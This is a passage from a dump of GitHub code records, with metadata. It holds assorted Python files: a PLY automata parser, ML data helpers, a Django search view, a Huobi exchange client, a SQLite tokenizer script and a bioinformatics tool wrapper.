main function\n\n\n\n\n","repo_name":"alc258/Cs0008-f2016","sub_path":"f2016_cs8_alc258_a2/f2016_cs8_alc258_a2.py","file_name":"f2016_cs8_alc258_a2.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"40735209992","text":"import ply.yacc as yacc\nimport sys\n\nfrom am.am_lex import tokens\n\n\ndef update_cst(d1, d2, s):\n if isinstance(d2, dict):\n for r in d2:\n if r in d1:\n raise ValueError('Transition already defined state @%s read \\'%s' % (s, r))\n d1[r] = d2[r]\n elif isinstance(d2, list):\n for r, t in d2:\n if r in d1:\n raise ValueError(f'Transition already defined state @{s} read {r} : {t}')\n d1[r] = t\n\n\nclass AM:\n __slots__ = ('transitions', 'initial_state', 'end_states', 'undefined_state', 'nb_tapes', 'name')\n\n def __repr__(self):\n return f'{self.name} {self.nb_tapes} >{self.initial_state} {self.end_states} {self.undefined_state} {len(self.transitions)}/{sum(len(i) for i in self.transitions.values())}'\n\n def set_transitions(self, tr):\n self.transitions = {}\n for s in tr:\n self.transitions[s] = {}\n for t in tr[s]:\n if len(t) != self.nb_tapes:\n raise ValueError(f'inconsistent number of tapes in {self.name} {s} : got {len(t)}, expecting {self.nb_tapes}')\n sl = {len(l) for s in (t, tr[s][t][0]) for l in s}\n sl.discard(1)\n if len(sl) > 1:\n raise ValueError(f'inconsistent number of options in {self.name} {sl}')\n if not sl:\n mv, ns = tr[s][t][1:]\n if ns is None: ns = s\n update_cst(self.transitions[s], {tuple(r[0] for r in t): ((tuple(r[0] for r in tr[s][t][0])), mv, ns)}, s)\n else:\n mv, ns = tr[s][t][1:]\n if ns is None: ns = s\n for i in range(sl.pop()):\n update_cst(self.transitions[s], {tuple(r[i if len(r) > 1 else 0] for r in t): ((tuple(r[i if len(r) > 1 else 0] for r in tr[s][t][0])), mv, ns)}, s)\n\n\ndef p_all(p):\n '''\n all : am\n | all am\n '''\n if len(p) == 2:\n p[0] = [p[1]]\n else:\n p[0] = p[1]\n p[0].append(p[2])\n\n\ndef p_am(p):\n '''\n am : name specif trans\n '''\n res = AM()\n res.initial_state = p[2][0]\n res.end_states = p[2][1]\n res.undefined_state = p[2][2]\n res.nb_tapes = p[1][1]\n res.name = p[1][0]\n res.set_transitions(p[3])\n\n p[0] = res\n\n\ndef p_name(p):\n '''\n name : NEW STRING INT\n '''\n p[0] = p[2:]\n\n\ndef p_specif(p):\n '''\n specif : start\n | start ends\n | start ends s_error\n '''\n p[0] = p[1:]\n if len(p[0]) < 2:\n p[0].append(())\n if len(p[0]) < 3:\n p[0].append(('ERROR', 'ERROR'))\n p[0] = tuple(p[0])\n\n\ndef p_start(p):\n '''\n start : START STATE\n '''\n p[0] = p[2]\n\n\ndef p_ends(p):\n '''\n ends : end\n | ends end\n '''\n if len(p) == 2:\n p[0] = {p[1][0]: p[1][1]}\n else:\n p[0] = p[1]\n if p[2][0] in p[0]:\n raise ValueError(f'multiple end results for state {p[2][0]}')\n p[0][p[2][0]] = p[2][1]\n\n\ndef p_end(p):\n '''\n end : END STATE STRING\n s_error : UNDEFINED STATE STRING\n '''\n p[0] = p[2], p[3]\n\n\ndef p_am_1(p):\n '''\n trans : state_tr\n '''\n p[0] = {p[1][0]: p[1][1]}\n\n\ndef p_am_2(p):\n '''\n trans : trans state_tr\n '''\n p[0] = p[1]\n if p[2][0] in p[0]:\n update_cst(p[0][p[2][0]], p[2][1], p[2][0])\n else:\n p[0][p[2][0]] = p[2][1]\n\n\ndef p_state(p):\n '''\n state_tr : full_transition transition_list\n '''\n update_cst(p[1][1], p[2], p[1][0])\n p[0] = p[1]\n\n\ndef p_full_transition(p):\n '''\n full_transition : FROM STATE transition\n '''\n p[0] = p[2], {p[3][0]: p[3][1]}\n\n\ndef p_transition(p):\n '''\n transition : reads writes moves STATE\n transition : reads writes 
moves\n '''\n if not p[2]:\n p[2] = p[1]\n if len(set(len(i) for i in p[1:4])) > 1:\n raise ValueError('Inconsistent numbers of heads in transition')\n p[0] = tuple(p[1]), (tuple(p[2]), tuple(p[3]), p[4] if len(p) > 4 else None)\n\n\ndef p_transition_list(p):\n '''\n transition_list : transition_list transition\n | empty\n '''\n if len(p) == 2:\n p[0] = []\n else:\n p[0] = p[1]\n p[0].append(p[2])\n\n\ndef p_empty(p):\n 'empty :'\n pass\n\n\ndef p_reads(p):\n '''\n reads : letters\n | reads COMMA letters\n moves : MOVE\n | moves COMMA MOVE\n letters : LETTER\n | letters PIPE LETTER\n '''\n if len(p) == 2:\n p[0] = (p[1],)\n else:\n p[0] = p[1] + (p[3],)\n\n\ndef p_writes(p):\n '''\n writes : reads\n | empty\n '''\n p[0] = p[1] or []\n\n\ndef p_error(p):\n if p is None:\n print(\"Syntax error : unexpected end of file\", file=sys.stderr)\n else:\n print(f\"Syntax error in input on token {p.type} {p.value} on line {p.lineno} at pos {p.lexpos-p.lexer.linestart}\", file=sys.stderr)\n if p.type == p.value == 'END':\n print(\"Maybe you forgot the START statement before END ?\", file=sys.stderr)\n sys.exit(-1)\n\n\nparser = yacc.yacc()\n\n\ndef am_from_string(s):\n lm = parser.parse(s)\n for m in lm:\n for e in m.end_states:\n if e in m.transitions:\n raise ValueError(f\"end state {e} with transitions in {m.name}\")\n return lm\n","repo_name":"ChristophePapazian/Automatic-Machines-Simulator","sub_path":"am/am_parser.py","file_name":"am_parser.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"} +{"seq_id":"9192700297","text":"import csv\n\nimport numpy as np\n\ncol_filter = []\ncol_filter.append(list(range(0, 1))) # age\ncol_filter.append(list(range(1, 2))) # fnlwgt\n# col_filter.append(list(range(2, 3))) # sex\ncol_filter.append(list(range(3, 5))) # capital gain/loss\ncol_filter.append(list(range(5, 6))) # hours_per_week\ncol_filter.append(list(range(6, 15))) # employer\ncol_filter.append(list(range(15, 22))) # edu_num\ncol_filter.append(list(range(22, 31))) # edu\n# col_filter.append(list(range(31, 38))) # maritial\ncol_filter.append(list(range(38,53))) # occupation\ncol_filter.append(list(range(53, 59))) # relationship\n# col_filter.append(list(range(59,64))) # race\ncol_filter.append(list(range(64, 106))) # country\ncol_filter = sum(col_filter, [])\nFEATURES = len(col_filter)\n\n\ndef activate(x):\n out = 1.0 / (1.0 + np.exp(x))\n return np.clip(out, 1e-8, 1-(1e-8))\n\ndef saver(weights, bias, modelFile):\n with open(modelFile, 'w') as of:\n w = csv.writer(of)\n w.writerow([bias])\n w.writerow(weights.tolist())\n\ndef loader(modelFile):\n with open(modelFile, 'r') as of:\n r = csv.reader(of)\n row = next(r)\n bias = float(row[0])\n row = next(r)\n weights = np.array([float(x) for x in row])\n return weights, bias\n\ndef saveOutput(arr, outputFile):\n with open(outputFile, 'w') as of:\n w = csv.writer(of)\n w.writerow([\"id\", \"label\"])\n w.writerows(arr)\n\ndef normalize(X_all, X_test):\n # Feature normalization with train and test X\n X_train_test = np.concatenate((X_all, X_test))\n mu = (sum(X_train_test) / X_train_test.shape[0])\n sigma = np.std(X_train_test, axis=0)\n mu = np.tile(mu, (X_train_test.shape[0], 1))\n sigma = np.tile(sigma, (X_train_test.shape[0], 1))\n X_train_test_normed = (X_train_test - mu) / sigma\n\n # Split to train, test again\n X_all = X_train_test_normed[0:X_all.shape[0]]\n X_test = X_train_test_normed[X_all.shape[0]:]\n return X_all, X_test\n\ndef readData(X_train, X_test, 
Y_train, col_filter=col_filter):\n x_d = np.genfromtxt(\n X_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n t_d = np.genfromtxt(\n X_test,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n y_d = np.genfromtxt(\n Y_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',')\n x_d, t_d = normalize(x_d, t_d)\n\n return x_d, t_d, y_d\n\ndef cleanReadData(X_train, X_test, Y_train, col_filter=col_filter):\n x_d = np.genfromtxt(\n X_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n t_d = np.genfromtxt(\n X_test,\n dtype=np.float32,\n skip_header=1,\n delimiter=',',\n usecols=col_filter)\n y_d = np.genfromtxt(\n Y_train,\n dtype=np.float32,\n skip_header=1,\n delimiter=',')\n\n return x_d, t_d, y_d\n","repo_name":"erred/ntu-ML2017FALL","sub_path":"hw2/iofn.py","file_name":"iofn.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"32795970803","text":"import Options\nfrom os import popen, unlink, symlink, getcwd\nfrom os.path import exists\nimport sys\n\nsrcdir = \".\"\nblddir = \"build\"\nVERSION = \"0.0.1\"\n\ndef set_options(opt):\n opt.tool_options(\"compiler_cxx\")\n\ndef configure(conf):\n conf.check_tool(\"compiler_cxx\")\n conf.check_tool(\"node_addon\")\n\ndef build(bld):\n obj = bld.new_task_gen(\"cxx\", \"shlib\", \"node_addon\")\n obj.target = \"uuid\"\n obj.find_sources_in_dirs(\"src\")\n # see http://www.mail-archive.com/programming@jsoftware.com/msg05886.html\n # Thanks to Elijah Insua\n # http://groups.google.com/group/nodejs/msg/442a49ce6f86d70d\n if sys.platform == 'darwin':\n obj.lib = [\"System\"]\n else:\n obj.lib = [\"uuid\"]\n\ndef shutdown(bld):\n # HACK to get binding.node out of build directory.\n # better way to do this?\n if Options.commands['clean']:\n if exists('uuid.node'): unlink('uuid.node')\n else:\n if exists('build/default/uuid.node') and not exists('uuid.node'):\n symlink(getcwd()+'/build/default/uuid.node', 'uuid.node')\n","repo_name":"weaver/uuidjs","sub_path":"wscript","file_name":"wscript","file_ext":"","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"32288370398","text":"# Symmetric binary tree\n\nfrom collections import deque \nclass TreeNode():\n def __init__(self,item):\n self._item = item\n self._left = None\n self._right = None\n self._father = None\n def __repr__(self):\n return str(self._item)\n\n\nclass Tree():\n def __init__(self):\n self._root = None\n\n def bfs(self):\n ret = []\n queue = deque([self._root])\n while queue:\n node = queue.popleft()\n if node:\n ret.append(node._item)\n queue.append(node._left)\n queue.append(node._right)\n return ret\n\ndef symmetric_tree(tree_root1,tree_root2):\n if tree_root1 is None and tree_root2 is None:\n return True\n if tree_root1 is None or tree_root2 is None:\n return False\n if tree_root1._item != tree_root2._item:\n return False\n return symmetric_tree(tree_root1._left,tree_root2._right) and symmetric_tree(tree_root1._right,tree_root2._left)\n\n\nif __name__ == \"__main__\":\n node11 = TreeNode(8)\n node12 = TreeNode(6)\n node13 = TreeNode(6)\n node14 = TreeNode(5)\n node15 = TreeNode(7)\n node16 = TreeNode(7)\n node17 = TreeNode(5)\n node21 = TreeNode(8)\n node22 = TreeNode(6)\n node23 = TreeNode(9)\n node24 = TreeNode(5)\n node25 = TreeNode(7)\n node26 = TreeNode(7)\n node27 = TreeNode(5)\n node31 = TreeNode(7)\n node32 = TreeNode(7)\n 
node33 = TreeNode(7)\n node34 = TreeNode(7)\n node35 = TreeNode(7)\n node36 = TreeNode(7)\n node11._left = node12\n node11._right = node13\n node12._left = node14\n node12._right = node15\n node13._left = node16\n node13._right = node17\n node21._left = node22\n node21._right = node23\n node22._left = node24\n node22._right = node25\n node23._left = node26\n node23._right = node27\n node31._left = node32\n node31._right = node33\n node32._left = node34\n node32._right = node35\n node33._left = node36\n tree1 = Tree()\n tree1._root = node11\n tree2 = Tree()\n tree2._root = node21\n tree3 = Tree()\n tree3._root = node31\n print(tree1.bfs())\n print(tree2.bfs())\n print(tree3.bfs())\n print(symmetric_tree(node11,node11))\n print(symmetric_tree(node21,node21))\n print(symmetric_tree(node31,node31))\n \n","repo_name":"hongyesuifeng/python-algorithm","sub_path":"python-offer/question28.py","file_name":"question28.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38132551507","text":"# load libraries\nfrom tkinter.messagebox import showerror\nfrom keras.preprocessing import image\nfrom keras.models import load_model\nfrom matplotlib.pyplot import text\nimport matplotlib.pyplot as plt\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nimport tensorflow_hub as hub\nfrom pyparsing import col\nimport tensorflow as tf\nfrom tkinter import ttk\nimport tkinter as tk\nfrom cv2 import cv2\nimport numpy as np\nimport os\nfrom sklearn.metrics import multilabel_confusion_matrix\nimport csv\n\n# root window\nroot = tk.Tk()\nroot.title('Hasil Identifikasi Wayang Kulit (Image Testing)')\nroot.geometry('400x700')\nroot.resizable(False, False)\n\n# frame\nframe = ttk.Frame(root)\n# field options\nopsi = {'padx':5, 'pady':5}\n\nmodel_path = 'model/wayang_model_new_fix.h5'\nwayang_model = tf.keras.models.load_model((model_path),custom_objects={'KerasLayer':hub.KerasLayer})\n\n# define the array variable for the wayang classes\nwayang_class = [\"abimanyu\", \"anoman\", \"arjuna\", \"bagong\", \"baladewa\", \"bima\", \"buta\", \"cakil\", \"durna\", \"dursasana\", \"duryudana\",\n \"gareng\", \"gatotkaca\", \"karna\", \"kresna\", \"nakula_sadewa\", \"patih_sabrang\", \"petruk\", \"puntadewa\", \"semar\", \"sengkuni\", \"togog\"\n]\n\n# for the csv output\nkolom = [\"Data Aktual\", \"Data Prediksi\"]\n\ntk.Label(root,\n text=\"Hasil Penggujian\",\n font=\"Helvetica 12 bold\",\n fg=\"black\").pack()\n\ndef load_image(img_path, show=False):\n\n # acquire the image and convert it to an edge image, with size (224,224)\n img = cv2.imread(img_path)\n img = cv2.resize(img, (224,224))\n # cv2.imshow(\"Gambar\", img)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img = cv2.Canny(img, 100, 200)\n cv2.imwrite(\"simpan/citra_uji.jpg\", img)\n\n # convert the image to an array and add a batch dimension with expand_dims\n img = image.load_img(\"simpan/citra_uji.jpg\", target_size=(224, 224))\n img_tensor = image.img_to_array(img) # (height, width, channels)\n img_tensor = np.expand_dims(img_tensor, axis=0) # (1, height, width, channels), add a dimension because the model expects this shape: (batch_size, height, width, channels)\n img_tensor /= 255. 
# imshow expects values in the range [0, 1]\n\n if show:\n plt.imshow(img_tensor[0]) \n plt.axis('off')\n plt.show()\n\n return img_tensor\n\ncurrdir = os.getcwd()\nfile_path = filedialog.askdirectory(initialdir=currdir, title='Please Select a Directory Raw Dataset')\n\n#path=os.path.dirname(file_path)\n\nbenar = 0\nsalah = 0\n\ndata_akt = []\ndata_pred = []\n\nfor sub_class in os.listdir(file_path):\n sub_fold = os.path.join(file_path,sub_class)\n for images in os.listdir(sub_fold):\n \n new_image = load_image(os.path.join(sub_fold, images))\n\n # check the prediction for the test image\n pred = wayang_model.predict(new_image)\n\n if pred is not None:\n\n # variables to hold the prediction result + similarity percentage\n top = np.argsort(pred[0])[:-4:-1]\n hasil = \"{}\".format(wayang_class[top[0]])+\" ({:.2})\".format(pred[0][top[0]])\n nama_wayang = \"{}\".format(wayang_class[top[0]])\n\n data_akt.append(sub_class)\n data_pred.append(nama_wayang)\n\n # check whether the folder name matches the prediction result\n if sub_class == nama_wayang:\n print('Benar',images, sub_class, hasil)\n benar += 1\n else:\n print('salah',images, sub_class, hasil)\n salah += 1\n\n\ntotal = salah+benar\n# persen = (benar/total)*100\n\nprint(\"data aktual: \",data_akt)\nprint(\"\\n\")\nprint(\"data prediksi: \",data_pred)\nprint(\"\\n\")\n\n# confusion matrix for multi-class classification\nconf_m = multilabel_confusion_matrix(data_akt, data_pred, labels=wayang_class)\n\nfor i in range(22):\n \n # sklearn's multilabel_confusion_matrix returns [[TN, FP], [FN, TP]] for each class\n TN = conf_m[i][0][0]\n FP = conf_m[i][0][1]\n FN = conf_m[i][1][0]\n TP = conf_m[i][1][1]\n\n Akurasi = (TP+TN)/(TP+FP+FN+TN)\n Presisi = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(wayang_class[i]+\" | akurasi: {:.2}\".format(Akurasi)+\" presisi: {:.2}\".format(Presisi)+\" recall: {:.2}\".format(Recall))\n print(conf_m[i])\n\n tk.Label(root,\n text=wayang_class[i],\n font=\"Helvetica 12\",\n fg=\"blue\").pack(anchor=\"w\")\n\n tk.Label(root,\n text=\"Akurasi - {:.2}\".format(Akurasi)+\" presisi: {:.2}\".format(Presisi)+\" recall: {:.2}\".format(Recall),\n font=\"Helvetica 10\",\n fg=\"black\").pack(anchor=\"w\")\n\n# import csv\nwith open('prediksi.csv', 'w', encoding='UTF8', newline='') as f:\n writer = csv.writer(f)\n\n writer.writerow(kolom)\n\n writer.writerows([data_akt])\n writer.writerows([data_pred])\n# print([data_akt])\n\nroot.mainloop()","repo_name":"SandingRiyanto/IdentifikasiWayangKulit_TA","sub_path":"pengujian.py","file_name":"pengujian.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36419322881","text":"import collections\nimport math\n\nfrom django.http import Http404\nfrom django.shortcuts import render\n\nfrom .search import search_query, search_single_dataset, more_like\n\nfrom stats.models import StatRecord\n\ndef view_dataset(request, slug):\n dataset = search_single_dataset(slug)\n if not dataset:\n raise Http404()\n\n StatRecord.record_now(\n dataset['organisation']['id'],\n dataset['id'],\n dataset['title'],\n 'view'\n )\n\n more = more_like(dataset)\n\n return render(request, 'dataset/view.html', { 'dataset': dataset, 'more': more })\n\n\nFILTERS = {\n 'organisation': 'organisation_name',\n 'publisher': 'organisation_name'\n}\n\ndef search(request):\n query = request.GET.get('q')\n\n page = 1\n try:\n page = int(request.GET.get('page'))\n except:\n page = 1\n\n applied_filters = {}\n filters = {}\n for k, v in FILTERS.items():\n val = request.GET.get(k)\n if val:\n filters[v] = 
val\n applied_filters[k] = val\n\n page_size = 20\n\n datasets, total = search_query(query, filters=filters, offset=(page * page_size) - page_size, limit=page_size)\n page_count = math.ceil(float(total) / page_size)\n\n if query:\n StatRecord.record_bulk_now(\n [d['organisation']['id'] for d in datasets],\n [d['id'] for d in datasets],\n [d['title'] for d in datasets],\n 'search'\n )\n\n organisations = collections.OrderedDict()\n organisations['cabinet-office'] = 'Cabinet Office'\n\n\n\n return render(request, 'dataset/search.html', {\n 'organisations': organisations,\n 'applied_filters': applied_filters,\n 'datasets': datasets,\n 'total': total,\n 'page_count': page_count,\n 'page_range': range(1, page_count+1),\n 'current_page': page,\n 'q': query or \"\"\n })\n","repo_name":"datagovuk/find_data_alpha","sub_path":"src/dataset/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19443249174","text":"#User function Template for python3\n\ndef reverseWord(s):\n characters = s.split()\n rev_characters=[char[::-1] for char in characters]\n reverseWord=\" \".join(rev_characters)\n \n return reverseWord\n\n\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == \"__main__\":\n t = int(input())\n while(t>0):\n s = input()\n print(reverseWord(s))\n t = t-1\n\n# } Driver Code Ends","repo_name":"htcmansi/LeetCode-Solutions","sub_path":"Reverse a String - GFG/reverse-a-string.py","file_name":"reverse-a-string.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38392475354","text":"import psycopg2\n\n# Connect to the database\nconn = psycopg2.connect(\n host=\"hostname\",\n database=\"database_name\",\n user=\"username\",\n password=\"password\"\n)\n\n# Create a cursor object\ncur = conn.cursor()\n\n# Execute the query\nquery = \"\"\"\nSELECT zavarovanec.kzzs, diagnoza.slovensko_ime\nFROM zavarovanec\nLEFT JOIN obravnava ON zavarovanec.kzzs = obravnava.kzzs\nLEFT JOIN diagnoza ON obravnava.st_obravnave = diagnoza.st_obravnave\nORDER BY obravnava.cas_zacetka DESC;\n\"\"\"\ncur.execute(query)\n\n# Fetch and print the results\nresults = cur.fetchall()\nfor row in results:\n print(row)\n\n# Close the cursor and connection\ncur.close()\nconn.close()","repo_name":"al-pi314/data_managment_technologies","sub_path":"nosql/postgresql.py","file_name":"postgresql.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31787680883","text":"import logging\nfrom typing import Optional\n\nfrom exch.huobi.hbdm.HuobiRestClient import HuobiRestClient\nfrom exch.huobi.hbdm.HuobiWebSocketClient import HuobiWebSocketClient\nfrom exch.huobi.hbdm.broker.HuobiBrokerHbdm import HuobiBrokerHbdm\nfrom exch.huobi.hbdm.feed.HuobiCandlesFeedHbdm import HuobiCandlesFeedHbdm\nfrom exch.huobi.hbdm.feed.HuobiWebSocketFeedHbdm import HuobiWebSocketFeedHbdm\n\n\nclass HuobiExchangeHbdm:\n \"\"\" Huobi derivatives market exchange: futures, swaps \"\"\"\n\n def __init__(self, config: dict):\n \n self.config = config\n self.__rest_client: Optional[HuobiRestClient] = None\n self.__websocket_client_market: Optional[HuobiWebSocketClient] = None\n self.__websocket_client_broker: Optional[HuobiWebSocketClient] = None\n\n self.__websocket_feed: Optional[HuobiWebSocketFeedHbdm] = None\n 
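# NOTE: these attributes start as None and are created lazily by the accessor methods below.\n 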
self.__candles_feed: Optional[HuobiCandlesFeedHbdm] = None\n\n self.__broker: Optional[HuobiBrokerHbdm] = None\n\n def _key_secret(self):\n key = self.config[\"pytrade2.exchange.huobi.connector.key\"]\n secret = self.config[\"pytrade2.exchange.huobi.connector.secret\"]\n return key, secret\n\n def broker(self):\n\n if not self.__broker:\n self.__broker = HuobiBrokerHbdm(self.config,\n rest_client=self._rest_client(),\n ws_client=self._websocket_client_broker(),\n ws_feed=self.websocket_feed())\n return self.__broker\n\n def candles_feed(self):\n if not self.__candles_feed:\n self.__candles_feed = HuobiCandlesFeedHbdm(self.config,\n self._rest_client(),\n self._websocket_client_market())\n return self.__candles_feed\n\n def websocket_feed(self) -> HuobiWebSocketFeedHbdm:\n \"\"\" Binance websocket feed lazy creation \"\"\"\n if not self.__websocket_feed:\n self.__websocket_feed = HuobiWebSocketFeedHbdm(config=self.config,\n rest_client=self._rest_client(),\n ws_client=self._websocket_client_market())\n return self.__websocket_feed\n\n def _websocket_client_market(self) -> HuobiWebSocketClient:\n if not self.__websocket_client_market:\n # wss://api.hbdm.com/swap-ws\n key, secret = self._key_secret()\n self.__websocket_client_market = HuobiWebSocketClient(host=\"api.hbdm.com\",\n path=\"/linear-swap-ws\",\n access_key=key,\n secret_key=secret,\n be_spot=False, is_broker=False)\n return self.__websocket_client_market\n\n def _websocket_client_broker(self) -> HuobiWebSocketClient:\n if not self.__websocket_client_broker:\n key, secret = self._key_secret()\n self.__websocket_client_broker = HuobiWebSocketClient(host=\"api.hbdm.com\",\n path=\"/linear-swap-notification\",\n access_key=key,\n secret_key=secret,\n be_spot=False, is_broker=True)\n return self.__websocket_client_broker\n\n def _rest_client(self):\n if not self.__rest_client:\n self.__rest_client = HuobiRestClient(*self._key_secret())\n return self.__rest_client\n","repo_name":"DmitryPukhov/pytrade2","sub_path":"pytrade2/exch/huobi/hbdm/HuobiExchangeHbdm.py","file_name":"HuobiExchangeHbdm.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"71"} +{"seq_id":"25430446740","text":"# -*- coding: utf-8 -*-\n__author__ = 'zhyq'\n\nimport os\n\n# app path\nCUR_PATH = os.path.dirname(os.path.abspath(__file__))\n\n# app start status\nDEBUG = False\n\nif os.path.exists(os.path.join(CUR_PATH, '__test__')):\n DEBUG = True\n","repo_name":"wecatch/app-turbo","sub_path":"demos/conf/global_setting.py","file_name":"global_setting.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"71"} +{"seq_id":"42816422639","text":"import os, sys, getopt\nimport sqlite3\nfrom datetime import datetime\nfrom utils.db import DbException\nfrom tokens.lexer import Lexer\nfrom tokens.preparser import PreParser\nfrom tokens.tokenizer import Tokenizer, tokenize\n\n\nHELP = 'Usage:\\npython tpaths_add_one_missing.py --dbpath=\"\" --pathid=\\n'\n\ndef add_one_missing(conn: sqlite3.Connection, id: int):\n \"\"\"Adds missing `tokens` and `token_paths` of a single unlabelled string referenced by a path.\"\"\"\n \n print(f\"start:\\t{datetime.now()}\")\n\n c = conn.cursor()\n\n # Create function-token xrefs table\n c.execute('''CREATE TABLE IF NOT EXISTS token_paths (\n path_id INTEGER NOT NULL,\n func_addr INTEGER NOT NULL,\n string_addr INTEGER NOT NULL,\n token_literal TEXT NOT NULL,\n names_func 
INTEGER)''')\n\n try:\n c.execute(\"SELECT * FROM paths WHERE id = ?\", (id,))\n path = c.fetchone()\n # 'no such table: x'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n if path is None:\n print(\"Invalid path id\")\n sys.exit()\n\n func_addr = path[1]\n string_addr = path[2]\n\n try:\n c.execute(\"SELECT literal FROM strings WHERE address = ?\", (string_addr,))\n string_literal = c.fetchone()\n # 'no such table: x'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n if string_literal is None:\n print(\"Referenced string doesn't exist in the database\")\n sys.exit()\n\n string_literal = string_literal[0]\n\n lexer = Lexer(\"\")\n parser = PreParser([])\n tokenizer = Tokenizer([])\n\n tokens = tokenize(string_literal, lexer, parser, tokenizer)\n\n for token in tokens:\n try:\n try:\n c.execute(\"INSERT INTO tokens (string_addr,literal) VALUES (?,?)\", (string_addr, token.token))\n # UNIQUE constraint failed: tokens.literal - skip duplicates\n except sqlite3.IntegrityError:\n print(f\"Duplicate token: {token.token}\")\n\n c.execute(\"INSERT INTO token_paths (path_id,func_addr,string_addr,token_literal) VALUES (?,?,?,?)\", (id, func_addr, string_addr, token.token))\n # 'no such table: token_paths'\n except sqlite3.OperationalError as ex:\n print(ex)\n sys.exit()\n\n print(f\"end:\\t{datetime.now()}\")\n\n conn.commit()\n\ndef main(argv):\n db_path = \"\"\n id = \"\"\n # both -d and -p take an argument, so each needs a trailing ':' in the short-option spec\n opts, args = getopt.getopt(argv,\"hd:p:\",[\"dbpath=\", \"pathid=\"])\n for opt, arg in opts:\n if opt == '-h':\n print(HELP)\n sys.exit()\n elif opt in (\"-d\", \"--dbpath\"):\n db_path = arg\n elif opt in (\"-p\", \"--pathid\"):\n id = arg\n\n if db_path == \"\":\n raise DbException(f\"SQLite database path required\\n{HELP}\")\n if not os.path.isfile(db_path):\n raise DbException(f\"Database not found at {db_path}\")\n \n conn = sqlite3.connect(db_path)\n add_one_missing(conn, int(id))\n conn.close()\n \n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"michal-kapala/dubRE","sub_path":"scripts/tpaths_add_one_missing.py","file_name":"tpaths_add_one_missing.py","file_ext":"py","file_size_in_byte":2848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"33780104517","text":"import os\r\nimport subprocess\r\nfrom subprocess import PIPE \r\nimport common\r\n\r\nclass apprun:\r\n def __init__(self, config):\r\n self.cfg = config\r\n \r\n def printMsgLine(self, msg = ''):\r\n lines = msg.splitlines()\r\n for l in lines:\r\n print(' >', l)\r\n\r\n def execCmd(self, cmd, verbose = False):\r\n print('Run: >', cmd)\r\n proc = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, text=True, shell=True)\r\n if proc.returncode:\r\n print('Error:')\r\n self.printMsgLine(proc.stderr)\r\n print('')\r\n return False\r\n else:\r\n if verbose:\r\n self.printMsgLine(proc.stdout)\r\n else:\r\n self.printMsgLine('Completed.')\r\n print('')\r\n return 
True\r\n \r\n def runRScript(self, script, output = '', args = []):\r\n cmd = 'R --no-save --slave --vanilla'\r\n if len(args):\r\n cmd += ' --args'\r\n for arg in args:\r\n cmd += ' ' + str(arg)\r\n cmd += ' < ' + script\r\n if output:\r\n cmd += ' > ' + output\r\n print('Run: >', cmd)\r\n proc = subprocess.run(cmd, stdout=PIPE, stderr=PIPE, text=True, shell=True)\r\n if proc.returncode:\r\n print('Error:')\r\n self.printMsgLine(proc.stderr)\r\n print('')\r\n return False\r\n else:\r\n self.printMsgLine(proc.stdout)\r\n self.printMsgLine('Completed.')\r\n print('')\r\n return True\r\n\r\n def downloadSRA(self, srid, output = '.', option = {'thread':8}):\r\n os.chdir(self.cfg.TEMPORAL)\r\n cmd = 'fasterq-dump ' + srid + ' -O ' + output\r\n if option['thread']:\r\n cmd += ' -e ' + str(option['thread'])\r\n return self.execCmd(cmd)\r\n\r\n def runCutter(self, adaptor = '', site = '', input = '', output = ''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cutadapt'\r\n if site == '5p':\r\n cmd += ' -g'\r\n elif site == '3p':\r\n cmd += ' -a'\r\n elif site == 'both':\r\n cmd += ' -b'\r\n cmd += ' ' + adaptor + ' ' + input + ' > ' + output\r\n return self.execCmd(cmd)\r\n \r\n def runFastQC(self, input = '', output = ''):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'FastQC'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'fastqc -o ' + output + ' ' + input + ' &'\r\n return self.execCmd(cmd)\r\n\r\n def runFastQFilter(self, input = '', output = '', param = {}):\r\n common.addPath(self.cfg.APPS_DIR)\r\n dir, name = os.path.split(input)\r\n os.chdir(dir)\r\n cmd = 'fastp -i ' + input + ' -o ' + output\r\n if 'min_qual' in param:\r\n cmd += ' -q ' + str(param['min_qual'])\r\n if 'min_len' in 